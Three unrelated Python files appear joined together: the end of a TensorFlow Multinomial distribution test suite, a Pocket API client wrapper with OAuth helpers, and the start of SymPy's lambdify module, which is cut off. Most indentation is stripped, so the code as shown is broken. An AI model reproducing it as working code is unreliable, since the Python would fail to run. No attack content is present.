self.assertEqual(tensor_shape.TensorShape([2]), dist.get_event_shape())
self.assertEqual(tensor_shape.TensorShape([3, 2]), dist.get_batch_shape())
def testN(self):
p = [[0.1, 0.2, 0.7], [0.2, 0.3, 0.5]]
n = [[3.], [4]]
with self.test_session():
dist = ds.Multinomial(n=n, p=p)
self.assertEqual((2, 1), dist.n.get_shape())
self.assertAllClose(n, dist.n.eval())
def testP(self):
p = [[0.1, 0.2, 0.7]]
with self.test_session():
dist = ds.Multinomial(n=3., p=p)
self.assertEqual((1, 3), dist.p.get_shape())
self.assertEqual((1, 3), dist.logits.get_shape())
self.assertAllClose(p, dist.p.eval())
def testLogits(self):
p = np.array([[0.1, 0.2, 0.7]], dtype=np.float32)
logits = np.log(p) - 50.
with self.test_session():
multinom = ds.Multinomial(n=3., logits=logits)
self.assertEqual((1, 3), multinom.p.get_shape())
self.assertEqual((1, 3), multinom.logits.get_shape())
self.assertAllClose(p, multinom.p.eval())
self.assertAllClose(logits, multinom.logits.eval())
def testPmfNandCountsAgree(self):
p = [[0.1, 0.2, 0.7]]
n = [[5.]]
with self.test_session():
dist = ds.Multinomial(n=n, p=p, validate_args=True)
dist.pmf([2., 3, 0]).eval()
dist.pmf([3., 0, 2]).eval()
with self.assertRaisesOpError("Condition x >= 0.*"):
dist.pmf([-1., 4, 2]).eval()
with self.assertRaisesOpError("counts do not sum to n"):
dist.pmf([3., 3, 0]).eval()
def testPmfNonIntegerCounts(self):
p = [[0.1, 0.2, 0.7]]
n = [[5.]]
with self.test_session():
# No errors with integer n.
multinom = ds.Multinomial(n=n, p=p, validate_args=True)
multinom.pmf([2., 1, 2]).eval()
multinom.pmf([3., 0, 2]).eval()
# Counts don't sum to n.
with self.assertRaisesOpError("counts do not sum to n"):
multinom.pmf([2., 3, 2]).eval()
# Counts are non-integers.
with self.assertRaisesOpError("Condition x == y.*"):
multinom.pmf([1.0, 2.5, 1.5]).eval()
multinom = ds.Multinomial(n=n, p=p, validate_args=False)
multinom.pmf([1., 2., 2.]).eval()
# Non-integer arguments work.
multinom.pmf([1.0, 2.5, 1.5]).eval()
def testPmfBothZeroBatches(self):
with self.test_session():
# Both zero-batches. No broadcast
p = [0.5, 0.5]
counts = [1., 0]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfBothZeroBatchesNontrivialN(self):
with self.test_session():
# Both zero-batches. No broadcast
p = [0.1, 0.9]
counts = [3., 2]
dist = ds.Multinomial(n=5., p=p)
pmf = dist.pmf(counts)
# 5 choose 3 = 5 choose 2 = 10. 10 * (.9)^2 * (.1)^3 = 81/10000.
self.assertAllClose(81. / 10000, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testPmfPStretchedInBroadcastWhenSameRank(self):
with self.test_session():
p = [[0.1, 0.9]]
counts = [[1., 0], [0, 1]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose([0.1, 0.9], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfPStretchedInBroadcastWhenLowerRank(self):
with self.test_session():
p = [0.1, 0.9]
counts = [[1., 0], [0, 1]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose([0.1, 0.9], pmf.eval())
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenSameRank(self):
with self.test_session():
p = [[0.1, 0.9], [0.7, 0.3]]
counts = [[1., 0]]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(pmf.eval(), [0.1, 0.7])
self.assertEqual((2), pmf.get_shape())
def testPmfCountsStretchedInBroadcastWhenLowerRank(self):
with self.test_session():
p = [[0.1, 0.9], [0.7, 0.3]]
counts = [1., 0]
pmf = ds.Multinomial(n=1., p=p).pmf(counts)
self.assertAllClose(pmf.eval(), [0.1, 0.7])
self.assertEqual(pmf.get_shape(), (2))
def testPmfShapeCountsStretchedN(self):
with self.test_session():
# [2, 2, 2]
p = [[[0.1, 0.9], [0.1, 0.9]], [[0.7, 0.3], [0.7, 0.3]]]
# [2, 2]
n = [[3., 3], [3, 3]]
# [2]
counts = [2., 1]
pmf = ds.Multinomial(n=n, p=p).pmf(counts)
pmf.eval()
self.assertEqual(pmf.get_shape(), (2, 2))
def testPmfShapeCountsPStretchedN(self):
with self.test_session():
p = [0.1, 0.9]
counts = [3., 2]
n = np.full([4, 3], 5., dtype=np.float32)
pmf = ds.Multinomial(n=n, p=p).pmf(counts)
pmf.eval()
self.assertEqual((4, 3), pmf.get_shape())
def testMultinomialMean(self):
with self.test_session():
n = 5.
p = [0.1, 0.2, 0.7]
dist = ds.Multinomial(n=n, p=p)
expected_means = 5 * np.array(p, dtype=np.float32)
self.assertEqual((3,), dist.mean().get_shape())
self.assertAllClose(expected_means, dist.mean().eval())
def testMultinomialVariance(self):
with self.test_session():
n = 5.
p = [0.1, 0.2, 0.7]
dist = ds.Multinomial(n=n, p=p)
expected_variances = [[9. / 20, -1 / 10, -7 / 20],
[-1 / 10, 4 / 5, -7 / 10],
[-7 / 20, -7 / 10, 21 / 20]]
self.assertEqual((3, 3), dist.variance().get_shape())
self.assertAllClose(expected_variances, dist.variance().eval())
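  # Illustrative sketch (not part of the original test suite): the expected
  # covariance used in testMultinomialVariance above follows the closed form
  # n * (diag(p) - outer(p, p)); this helper reproduces it with plain numpy.
  @staticmethod
  def _example_multinomial_covariance(n=5., p=(0.1, 0.2, 0.7)):
    p = np.asarray(p)
    return n * (np.diag(p) - np.outer(p, p))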
def testMultinomialVarianceBatch(self):
with self.test_session():
# Shape [2]
n = [5.] * 2
# Shape [4, 1, 2]
p = [[[0.1, 0.9]], [[0.1, 0.9]]] * 2
dist = ds.Multinomial(n=n, p=p)
# Shape [2, 2]
inner_var = [[9. / 20, -9 / 20], [-9 / 20, 9 / 20]]
# Shape [4, 2, 2, 2]
expected_variances = [[inner_var, inner_var]] * 4
self.assertEqual((4, 2, 2, 2), dist.variance().get_shape())
self.assertAllClose(expected_variances, dist.variance().eval())
def testVarianceMultidimensional(self):
# Shape [3, 5, 4]
p = np.random.dirichlet([.25, .25, .25, .25], [3, 5]).astype(np.float32)
# Shape [6, 3, 3]
p2 = np.random.dirichlet([.3, .3, .4], [6, 3]).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1]).astype(np.float32)
with self.test_session():
dist = ds.Multinomial(ns, p)
dist2 = ds.Multinomial(ns2, p2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testSampleUnbiasedNonScalarBatch(self):
with self.test_session() as sess:
dist = ds.Multinomial(
n=5.,
logits=math_ops.log(2. * self._rng.rand(4, 3, 2).astype(np.float32)))
n = int(3e3)
x = dist.sample(n, seed=0)
sample_mean = math_ops.reduce_mean(x, 0)
# Cyclically rotate event dims left.
x_centered = array_ops.transpose(x - sample_mean, [1, 2, 3, 0])
sample_covariance = math_ops.matmul(
x_centered, x_centered, adjoint_b=True) / n
[
sample_mean_,
sample_covariance_,
actual_mean_,
actual_covariance_,
] = sess.run([
sample_mean,
sample_covariance,
dist.mean(),
dist.variance(),
])
self.assertAllEqual([4, 3, 2], sample_mean.get_shape())
self.assertAllClose(actual_mean_, sample_mean_, atol=0., rtol=0.07)
self.assertAllEqual([4, 3, 2, 2], sample_covariance.get_shape())
self.assertAllClose(
actual_covariance_, sample_covariance_, atol=0., rtol=0.10)
def testSampleUnbiasedScalarBatch(self):
with self.test_session() as sess:
dist = ds.Multinomial(
n=5., logits=math_ops.log(2. * self._rng.rand(4).astype(np.float32)))
n = int(5e3)
x = dist.sample(n, seed=0)
sample_mean = math_ops.reduce_mean(x, 0)
x_centered = x - sample_mean # Already transposed to [n, 2].
sample_covariance = math_ops.matmul(
x_centered, x_centered, adjoint_a=True) / n
[
sample_mean_,
sample_covariance_,
actual_mean_,
actual_covariance_,
] = sess.run([
sample_mean,
sample_covariance,
dist.mean(),
dist.variance(),
])
self.assertAllEqual([4], sample_mean.get_shape())
self.assertAllClose(actual_mean_, sample_mean_, atol=0., rtol=0.07)
self.assertAllEqual([4, 4], sample_covariance.get_shape())
self.assertAllClose(
actual_covariance_, sample_covariance_, atol=0., rtol=0.10)
if __name__ == "__main__":
test.main()
|
|
import requests
import json
from functools import wraps
class PocketException(Exception):
'''
Base class for all pocket exceptions
http://getpocket.com/developer/docs/errors
'''
pass
class InvalidQueryException(PocketException):
pass
class AuthException(PocketException):
pass
class RateLimitException(PocketException):
'''
http://getpocket.com/developer/docs/rate-limits
'''
pass
class ServerMaintenanceException(PocketException):
pass
EXCEPTIONS = {
400: InvalidQueryException,
401: AuthException,
403: RateLimitException,
503: ServerMaintenanceException,
}
def method_wrapper(fn):
@wraps(fn)
def wrapped(self, *args, **kwargs):
arg_names = list(fn.__code__.co_varnames)
arg_names.remove('self')
kwargs.update(dict(zip(arg_names, args)))
url = self.api_endpoints[fn.__name__]
payload = dict([
(k, v) for k, v in kwargs.items()
if v is not None
])
payload.update(self.get_payload())
return self.make_request(url, payload)
return wrapped
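# Illustrative sketch (not part of the original module): how `method_wrapper`
# maps positional/keyword arguments onto the request payload. `_FakeClient` is
# a hypothetical stand-in that records the payload instead of calling the real
# Pocket API.
class _FakeClient(object):
    api_endpoints = {'add': 'https://example.invalid/v3/add'}
    def get_payload(self):
        return {'consumer_key': 'ck', 'access_token': 'at'}
    def make_request(self, url, payload):
        return url, payload
    @method_wrapper
    def add(self, url, title=None, tags=None, tweet_id=None):
        '''Mirrors Pocket.add purely for demonstration.'''
# _FakeClient().add('http://example.com', title='demo') returns the endpoint
# and a payload containing the url, the title, and the credentials.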
def bulk_wrapper(fn):
@wraps(fn)
def wrapped(self, *args, **kwargs):
arg_names = list(fn.__code__.co_varnames)
arg_names.remove('self')
kwargs.update(dict(zip(arg_names, args)))
wait = kwargs.get('wait', True)
query = dict(
[(k, v) for k, v in kwargs.items() if v is not None]
)
# TODO: Fix this hack
query['action'] = 'add' if fn.__name__ == 'bulk_add' else fn.__name__
if wait:
self.add_bulk_query(query)
return self
else:
url = self.api_endpoints['send']
payload = {
'actions': [query],
}
payload.update(self.get_payload())
return self.make_request(
url,
json.dumps(payload),
headers={'content-type': 'application/json'},
)
return wrapped
class Pocket(object):
'''
    This class implements a basic Python wrapper around the Pocket API. For
    detailed documentation of the methods and what they do, please refer to
    the official Pocket API documentation at
http://getpocket.com/developer/docs/overview
'''
api_endpoints = dict(
(method, 'https://getpocket.com/v3/%s' % method)
for method in "add,send,get".split(",")
)
statuses = {
200: 'Request was successful',
400: 'Invalid request, please make sure you follow the '
'documentation for proper syntax',
401: 'Problem authenticating the user',
403: 'User was authenticated, but access denied due to lack of '
'permission or rate limiting',
503: 'Pocket\'s sync server is down for scheduled maintenance.',
}
def __init__(self, consumer_key, access_token):
self.consumer_key = consumer_key
self.access_token = access_token
self._bulk_query = []
self._payload = {
'consumer_key': self.consumer_key,
'access_token': self.access_token,
}
def get_payload(self):
return self._payload
def add_bulk_query(self, query):
self._bulk_query.append(query)
@staticmethod
def _post_request(url, payload, headers):
r = requests.post(url, data=payload, headers=headers)
return r
@classmethod
def _make_request(cls, url, payload, headers=None):
r = cls._post_request(url, payload, headers)
if r.status_code > 399:
error_msg = cls.statuses.get(r.status_code)
extra_info = r.headers.get('X-Error')
raise EXCEPTIONS.get(r.status_code, PocketException)(
'%s. %s' % (error_msg, extra_info)
)
return r.json() or r.text, r.headers
@classmethod
def make_request(cls, url, payload, headers=None):
return cls._make_request(url, payload, headers)
@method_wrapper
def add(self, url, title=None, tags=None, tweet_id=None):
'''
This method allows you to add a page to a user's list.
In order to use the /v3/add endpoint, your consumer key must have the
"Add" permission.
http://getpocket.com/developer/docs/v3/add
'''
@method_wrapper
def get(
self, state=None, favorite=None, tag=None, contentType=None,
sort=None, detailType=None, search=None, domain=None, since=None,
count=None, offset=None
):
'''
This method allows you to retrieve a user's list. It supports
retrieving items changed since a specific time to allow for syncing.
http://getpocket.com/developer/docs/v3/retrieve
'''
@method_wrapper
def send(self, actions):
'''
This method allows you to make changes to a user's list. It supports
adding new pages, marking pages as read, changing titles, or updating
tags. Multiple changes to items can be made in one request.
http://getpocket.com/developer/docs/v3/modify
'''
@bulk_wrapper
def bulk_add(
self, item_id, ref_id=None, tags=None, time=None, title=None,
url=None, wait=True
):
'''
Add a new item to the user's list
http://getpocket.com/developer/docs/v3/modify#action_add
'''
@bulk_wrapper
def archive(self, item_id, time=None, wait=True):
'''
Move an item to the user's archive
http://getpocket.com/developer/docs/v3/modify#action_archive
'''
@bulk_wrapper
def readd(self, item_id, time=None, wait=True):
'''
Re-add (unarchive) an item to the user's list
http://getpocket.com/developer/docs/v3/modify#action_readd
'''
@bulk_wrapper
def favorite(self, item_id, time=None, wait=True):
'''
Mark an item as a favorite
http://getpocket.com/developer/docs/v3/modify#action_favorite
'''
@bulk_wrapper
def unfavorite(self, item_id, time=None, wait=True):
'''
Remove an item from the user's favorites
http://getpocket.com/developer/docs/v3/modify#action_unfavorite
'''
@bulk_wrapper
def delete(self, item_id, time=None, wait=True):
'''
Permanently remove an item from the user's account
http://getpocket.com/developer/docs/v3/modify#action_delete
'''
@bulk_wrapper
def tags_add(self, item_id, tags, time=None, wait=True):
'''
Add one or more tags to an item
http://getpocket.com/developer/docs/v3/modify#action_tags_add
'''
@bulk_wrapper
def tags_remove(self, item_id, tags, time=None, wait=True):
'''
Remove one or more tags from an item
http://getpocket.com/developer/docs/v3/modify#action_tags_remove
'''
@bulk_wrapper
def tags_replace(self, item_id, tags, time=None, wait=True):
'''
Replace all of the tags for an item with one or more provided tags
http://getpocket.com/developer/docs/v3/modify#action_tags_replace
'''
@bulk_wrapper
def tags_clear(self, item_id, time=None, wait=True):
'''
Remove all tags from an item.
http://getpocket.com/developer/docs/v3/modify#action_tags_clear
'''
@bulk_wrapper
def tag_rename(self, item_id, old_tag, new_tag, time=None, wait=True):
'''
Rename a tag. This affects all items with this tag.
http://getpocket.com/developer/docs/v3/modify#action_tag_rename
'''
def commit(self):
'''
This method executes the bulk query, flushes stored queries and
returns the response
'''
url = self.api_endpoints['send']
payload = {
'actions': self._bulk_query,
}
payload.update(self._payload)
self._bulk_query = []
return self._make_request(
url,
json.dumps(payload),
headers={'content-type': 'application/json'},
)
@classmethod
def get_request_token(
cls, consumer_key, redirect_uri='http://example.com/', state=None
):
'''
Returns the request token that can be used to fetch the access token
'''
headers = {
'X-Accept': 'application/json',
}
url = 'https://getpocket.com/v3/oauth/request'
payload = {
'consumer_key': consumer_key,
'redirect_uri': redirect_uri,
}
if state:
payload['state'] = state
return cls._make_request(url, payload, headers)[0]['code']
@classmethod
def get_credentials(cls, consumer_key, code):
'''
        Fetches the access token using the request token and consumer key
'''
headers = {
'X-Accept': 'application/json',
}
url = 'https://getpocket.com/v3/oauth/authorize'
payload = {
'consumer_key': consumer_key,
'code': code,
}
return cls._make_request(url, payload, headers)[0]
@classmethod
def get_access_token(cls, consumer_key, code):
return cls.get_credentials(consumer_key, code)['access_token']
@classmethod
def get_auth_url(cls, code, redirect_uri='http://example.com'):
auth_url = ('https://getpocket.com/auth/authorize'
'?request_token=%s&redirect_uri=%s' % (code, redirect_uri))
return auth_url
@classmethod
def auth(
cls, consumer_key, redirect_uri='http://example.com/', state=None,
):
'''
        This is a helper method for interactively verifying that the OAuth flow works
http://getpocket.com/developer/docs/authentication
'''
code = cls.get_request_token(consumer_key, redirect_uri, state)
        auth_url = cls.get_auth_url(code, redirect_uri)
raw_input(
'Please open %s in your browser to authorize the app and '
'press enter:' % auth_url
)
return cls.get_access_token(consumer_key, code)
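# --- Minimal usage sketch (illustrative only) ---
# Assumes valid Pocket credentials; the consumer key and access token below
# are hypothetical placeholders. A real key comes from
# http://getpocket.com/developer/apps/ and the token from the OAuth flow
# implemented by get_request_token() / get_credentials() above.
if __name__ == '__main__':
    CONSUMER_KEY = '<your-consumer-key>'
    ACCESS_TOKEN = '<your-access-token>'
    pocket = Pocket(CONSUMER_KEY, ACCESS_TOKEN)
    # Single request: methods decorated with method_wrapper fire immediately
    # and return the parsed JSON response together with the response headers.
    response, headers = pocket.add(url='http://example.com/article')
    # Bulk mode: methods decorated with bulk_wrapper queue actions (wait=True,
    # the default) and return the Pocket instance, so calls can be chained and
    # flushed in a single /v3/send request via commit().
    pocket.archive(item_id='123').favorite(item_id='456')
    result, headers = pocket.commit()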
|
|
"""
This module provides convenient functions to transform sympy expressions to
lambda functions which can be used to calculate numerical values very fast.
"""
from __future__ import print_function, division
import inspect
import textwrap
from sympy.external import import_module
from sympy.core.compatibility import exec_, is_sequence, iterable, string_types, range, builtins
from sympy.utilities.decorator import doctest_depends_on
# These are the namespaces the lambda functions will use.
MATH = {}
MPMATH = {}
NUMPY = {}
SYMPY = {}
NUMEXPR = {}
# Default namespaces, letting us define translations that can't be defined
# by simple variable maps, like I => 1j
# These are separate from the names above because the above names are modified
# throughout this file, whereas these should remain unmodified.
MATH_DEFAULT = {}
MPMATH_DEFAULT = {}
NUMPY_DEFAULT = {"I": 1j}
SYMPY_DEFAULT = {}
NUMEXPR_DEFAULT = {}
# Mappings between sympy and other modules function names.
MATH_TRANSLATIONS = {
"Abs": "fabs",
"ceiling": "ceil",
"E": "e",
"ln": "log",
}
MPMATH_TRANSLATIONS = {
"Abs": "fabs",
"elliptic_k": "ellipk",
"elliptic_f": "ellipf",
"elliptic_e": "ellipe",
"elliptic_pi": "ellippi",
"ceiling": "ceil",
"chebyshevt": "chebyt",
"chebyshevu": "chebyu",
"E": "e",
"I": "j",
"ln": "log",
#"lowergamma":"lower_gamma",
"oo": "inf",
#"uppergamma":"upper_gamma",
"LambertW": "lambertw",
"MutableDenseMatrix": "matrix",
"ImmutableMatrix": "matrix",
"conjugate": "conj",
"dirichlet_eta": "altzeta",
"Ei": "ei",
"Shi": "shi",
"Chi": "chi",
"Si": "si",
"Ci": "ci"
}
NUMPY_TRANSLATIONS = {
"Abs": "abs",
"acos": "arccos",
"acosh": "arccosh",
"arg": "angle",
"asin": "arcsin",
"asinh": "arcsinh",
"atan": "arctan",
"atan2": "arctan2",
"atanh": "arctanh",
"ceiling": "ceil",
"E": "e",
"im": "imag",
"ln": "log",
"Mod": "mod",
"oo": "inf",
"re": "real",
"SparseMatrix": "array",
"ImmutableSparseMatrix": "array",
"Matrix": "array",
"MutableDenseMatrix": "array",
"ImmutableMatrix": "array",
"ImmutableDenseMatrix": "array",
}
NUMEXPR_TRANSLATIONS = {}
# Available modules:
MODULES = {
"math": (MATH, MATH_DEFAULT, MATH_TRANSLATIONS, ("from math import *",)),
"mpmath": (MPMATH, MPMATH_DEFAULT, MPMATH_TRANSLATIONS, ("from mpmath import *",)),
"numpy": (NUMPY, NUMPY_DEFAULT, NUMPY_TRANSLATIONS, ("import_module('numpy')",)),
"sympy": (SYMPY, SYMPY_DEFAULT, {}, (
"from sympy.functions import *",
"from sympy.matrices import *",
"from sympy import Integral, pi, oo, nan, zoo, E, I",)),
"numexpr" : (NUMEXPR, NUMEXPR_DEFAULT, NUMEXPR_TRANSLATIONS,
("import_module('numexpr')", )),
}
def _import(module, reload="False"):
"""
Creates a global translation dictionary for module.
    The argument module has to be one of the following strings: "math",
    "mpmath", "numpy", "sympy", "numexpr".
    These dictionaries map names of SymPy functions to their equivalents in
    other modules.
"""
try:
namespace, namespace_default, translations, import_commands = MODULES[
module]
except KeyError:
raise NameError(
"'%s' module can't be used for lambdification" % module)
# Clear namespace or exit
if namespace != namespace_default:
# The namespace was already generated, don't do it again if not forced.
if reload:
namespace.clear()
namespace.update(namespace_default)
else:
return
for import_command in import_commands:
if import_command.startswith('import_module'):
module = eval(import_command)
if module is not None:
namespace.update(module.__dict__)
continue
else:
try:
exec_(import_command, {}, namespace)
continue
except ImportError:
pass
raise ImportError(
"can't import '%s' with '%s' command" % (module, import_command))
# Add translated names to namespace
for sympyname, translation in translations.items():
namespace[sympyname] = namespace[translation]
@doctest_depends_on(modules=('numpy',))
def lambdify(args, expr, modules=None, printer=None, use_imps=True,
dummify=True):
"""
Returns a lambda function for fast calculation of numerical values.
If not specified differently by the user, SymPy functions are replaced as
far as possible by either python-math, numpy (if available) or mpmath
functions - exactly in this order. To change this behavior, the "modules"
argument can be used. It accepts:
- the strings "math", "mpmath", "numpy", "numexpr", "sympy"
- any modules (e.g. math)
- dictionaries that map names of sympy functions to arbitrary functions
- lists that contain a mix of the arguments above, with higher priority
given to entries appearing first.
The default behavior is to substitute all arguments in the provided
expression with dummy symbols. This allows for applied functions (e.g.
f(t)) to be supplied as arguments. Call the function with dummify=False if
dummy substitution is unwanted (and `args` is not a string). If you want
to view the lambdified function or provide "sympy" as the module, you
should probably set dummify=False.
For functions involving large array calculations, numexpr can provide a
significant speedup over numpy. Please note that the available functions
for numexpr are more limited than numpy but can be expanded with
implemented_function and user defined subclasses of Function. If specified,
numexpr may be the only option in modules. The official list of numexpr
functions can be found at:
https://github.com/pydata/numexpr#supported-functions
In previous releases ``lambdify`` replaced ``Matrix`` with ``numpy.matrix``
by default. As of release 0.7.7 ``numpy.array`` is the default.
To get the old default behavior you must pass in ``[{'ImmutableMatrix':
numpy.matrix}, 'numpy']`` to the ``modules`` kwarg.
>>> from sympy import lambdify, Matrix
>>> from sympy.abc import x, y
>>> import numpy
>>> array2mat = [{'ImmutableMatrix': numpy.matrix}, 'numpy']
>>> f = lambdify((x, y), Matrix([x, y]), modules=array2mat)
>>> f(1, 2)
matrix([[1],
[2]])
Usage
=====
(1) Use one of the provided modules:
>>> from sympy import sin, tan, gamma
>>> from sympy.utilities.lambdify import lambdastr
>>> from sympy.abc import x, y
>>> f = lambdify(x, sin(x), "math")
    Attention: Functions that are not in the math module will raise a
               NameError when the lambda function is evaluated! So this would
               be better:
>>> f = lambdify(x, sin(x)*gamma(x), ("math", "mpmath", "sympy"))
(2) Use some other module:
>>> import numpy
>>> f = lambdify((x,y), tan(x*y), numpy)
Attention: There are naming differences between numpy and sympy. So if
you simply take the numpy module, e.g. sympy.atan will not be
translated to numpy.arctan. Use the modified module instead
by passing the string "numpy":
>>> f = lambdify((x,y), tan(x*y), "numpy")
>>> f(1, 2)
-2.18503986326
>>> from numpy import array
>>> f(array([1, 2, 3]), array([2, 3, 5]))
[-2.18503986 -0.29100619 -0.8559934 ]
(3) Use a dictionary defining custom functions:
>>> def my_cool_function(x): return 'sin(%s) is cool' % x
>>> myfuncs = {"sin" : my_cool_function}
>>> f = lambdify(x, sin(x), myfuncs); f(1)
'sin(1) is cool'
Examples
========
>>> from sympy.utilities.lambdify import implemented_function
>>> from sympy import sqrt, sin, Matrix
>>> from sympy import Function
>>> from sympy.abc import w, x, y, z
>>> f = lambdify(x, x**2)
>>> f(2)
4
>>> f = lambdify((x, y, z), [z, y, x])
>>> f(1,2,3)
[3, 2, 1]
>>> f = lambdify(x, sqrt(x))
>>> f(4)
2.0
>>> f = lambdify((x, y), sin(x*y)**2)
>>> f(0, 5)
0.0
>>> row = lambdify((x, y), Matrix((x, x + y)).T, modules='sympy')
>>> row(1, 2)
Matrix([[1, 3]])
Tuple arguments are handled and the lambdified function should
be called with the same type of arguments as were used to create
    the function:
>>> f = lambdify((x, (y, z)), x + y)
>>> f(1, (2, 4))
3
A more robust way of handling this is to always work with flattened
arguments:
>>> from sympy.utilities.iterables import flatten
>>> args = w, (x, (y, z))
>>> vals = 1, (2, (3, 4))
>>> f = lambdify(flatten(args), w + x + y + z)
>>> f(*flatten(vals))
10
Functions present in `expr` can also carry their own numerical
implementations, in a callable attached to the ``_imp_``
attribute. Usually you attach this using the
``implemented_function`` factory:
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> func = lambdify(x, f(x))
>>> func(4)
5
``lambdify`` always prefers ``_imp_`` implementations to implementations
in other namespaces, unless the ``use_imps`` input parameter is False.
"""
from sympy.core.symbol import Symbol
from sympy.utilities.iterables import flatten
# If the user hasn't specified any modules, use what is available.
module_provided = True
if modules is None:
module_provided = False
# Use either numpy (if available) or python.math where possible.
# XXX: This leads to different behaviour on different systems and
# might be the reason for irreproducible errors.
modules = ["math", "mpmath", "sympy"]
#Attempt to import numpy
try:
_import("numpy")
except ImportError:
pass
else:
modules.insert(1, "numpy")
# Get the needed namespaces.
namespaces = []
# First find any function implementations
if use_imps:
namespaces.append(_imp_namespace(expr))
# Check for dict before iterating
if isinstance(modules, (dict, str)) or not hasattr(modules, '__iter__'):
namespaces.append(modules)
else:
# consistency check
if _module_present('numexpr', modules) and len(modules) > 1:
raise TypeError("numexpr must be the only item in 'modules'")
namespaces += list(modules)
# fill namespace with first having highest priority
namespace = {}
for m in namespaces[::-1]:
buf = _get_namespace(m)
namespace.update(buf)
if hasattr(expr, "atoms"):
        # Try to extract symbols from the expression.
        # Move on if expr.atoms is not implemented.
syms = expr.atoms(Symbol)
for term in syms:
namespace.update({str(term): term})
if _module_present('numpy',namespaces) and printer is None:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import NumPyPrinter as printer
if _module_present('numexpr',namespaces) and printer is None:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import NumExprPrinter as printer
# Get the names of the args, for creating a docstring
if not iterable(args):
args = (args,)
names = []
# Grab the callers frame, for getting the names by inspection (if needed)
callers_local_vars = inspect.currentframe().f_back.f_locals.items()
for n, var in enumerate(args):
if hasattr(var, 'name'):
names.append(var.name)
else:
# It's an iterable. Try to get name by inspection of calling frame.
name_list = [var_name for var_name, var_val in callers_local_vars
if var_val is var]
if len(name_list) == 1:
names.append(name_list[0])
else:
# Cannot infer name with certainty. arg_# will have to do.
names.append('arg_' + str(n))
# Create lambda function.
lstr = lambdastr(args, expr, printer=printer, dummify=dummify)
flat = '__flatten_args__'
if flat in lstr:
namespace.update({flat: flatten})
# Provide lambda expression with builtins, and compatible implementation of range
namespace.update({'builtins':builtins, 'range':range})
func = eval(lstr, namespace)
# Apply the docstring
sig = "func({0})".format(", ".join(str(i) for i in names))
sig = textwrap.fill(sig, subsequent_indent=' '*8)
expr_str = str(expr)
if len(expr_str) > 78:
expr_str = textwrap.wrap(expr_str, 75)[0] + '...'
func.__doc__ = ("Created with lambdify. Signature:\n\n{sig}\n\n"
"Expression:\n\n{expr}").format(sig=sig, expr=expr_str)
return func
def _module_present(modname, modlist):
if modname in modlist:
return True
for m in modlist:
if hasattr(m, '__name__') and m.__name__ == modname:
return True
return False
def _get_namespace(m):
"""
    This is used by lambdify to parse its arguments.
"""
if isinstance(m, str):
_import(m)
return MODULES[m][0]
elif isinstance(m, dict):
return m
elif hasattr(m, "__dict__"):
return m.__dict__
else:
raise TypeError("Argument must be either a string, dict or module but it is: %s" % m)
def lambdastr(args, expr, printer=None, dummify=False):
"""
Returns a string that can be evaluated to a lambda function.
Examples
========
>>> from sympy.abc import x, y, z
>>> from sympy.utilities.lambdify import lambdastr
>>> lambdastr(x, x**2)
'lambda x: (x**2)'
>>> lambdastr((x,y,z), [z,y,x])
'lambda x,y,z: ([z, y, x])'
Although tuples may not appear as arguments to lambda in Python 3,
lambdastr will create a lambda function that will unpack the original
arguments so that nested arguments can be handled:
>>> lambdastr((x, (y, z)), x + y)
'lambda _0,_1: (lambda x,y,z: (x + y))(*list(__flatten_args__([_0,_1])))'
"""
# Transforming everything to strings.
from sympy.matrices import DeferredVector
from sympy import Dummy, sympify, Symbol, Function, flatten
if printer is not None:
if inspect.isfunction(printer):
lambdarepr = printer
else:
if inspect.isclass(printer):
lambdarepr = lambda expr: printer().doprint(expr)
else:
lambdarepr = lambda expr: printer.doprint(expr)
else:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import lambdarepr
def sub_args(args, dummies_dict):
if isinstance(args, str):
return args
elif isinstance(args, DeferredVector):
return str(args)
elif iterable(args):
dummies = flatten([sub_args(a, dummies_dict) for a in args])
return ",".join(str(a) for a in dummies)
else:
#Sub in dummy variables for functions or symbols
if isinstance(args, (Function, Symbol)):
dummies = Dummy()
dummies_dict.update({args : dummies})
return str(dummies)
else:
return str(args)
def sub_expr(expr, dummies_dict):
try:
expr = sympify(expr).xreplace(dummies_dict)
except Exception:
if isinstance(expr, DeferredVector):
pass
elif isinstance(expr, dict):
k = [sub_expr(sympify(a), dummies_dict) for a in expr.keys()]
v = [sub_expr(sympify(a), dummies_dict) for a in expr.values()]
expr = dict(zip(k, v))
elif isinstance(expr, tuple):
expr = tuple(sub_expr(sympify(a), dummies_dict) for a in expr)
elif isinstance(expr, list):
expr = [sub_expr(sympify(a), dummies_dict) for a in expr]
return expr
# Transform args
def isiter(l):
return iterable(l, exclude=(str, DeferredVector))
if isiter(args) and any(isiter(i) for i in args):
from sympy.utilities.iterables import flatten
import re
dum_args = [str(Dummy(str(i))) for i in range(len(args))]
iter_args = ','.join([i if isiter(a) else i
for i, a in zip(dum_args, args)])
lstr = lambdastr(flatten(args), expr, printer=printer, dummify=dummify)
flat = '__flatten_args__'
rv = 'lambda %s: (%s)(*list(%s([%s])))' % (
','.join(dum_args), lstr, flat, iter_args)
if len(re.findall(r'\b%s\b' % flat, rv)) > 1:
raise ValueError('the name %s is reserved by lambdastr' % flat)
return rv
dummies_dict = {}
if dummify:
args = sub_args(args, dummies_dict)
else:
if isinstance(args, str):
pass
elif iterable(args, exclude=DeferredVector):
args = ",".join(str(a) for a in args)
# Transform expr
if dummify:
if isinstance(expr, str):
pass
else:
expr = sub_expr(expr, dummies_dict)
expr = lambdarepr(expr)
return "lambda %s: (%s)" % (args, expr)
def _imp_namespace(expr, namespace=None):
""" Return namespace dict with function implementations
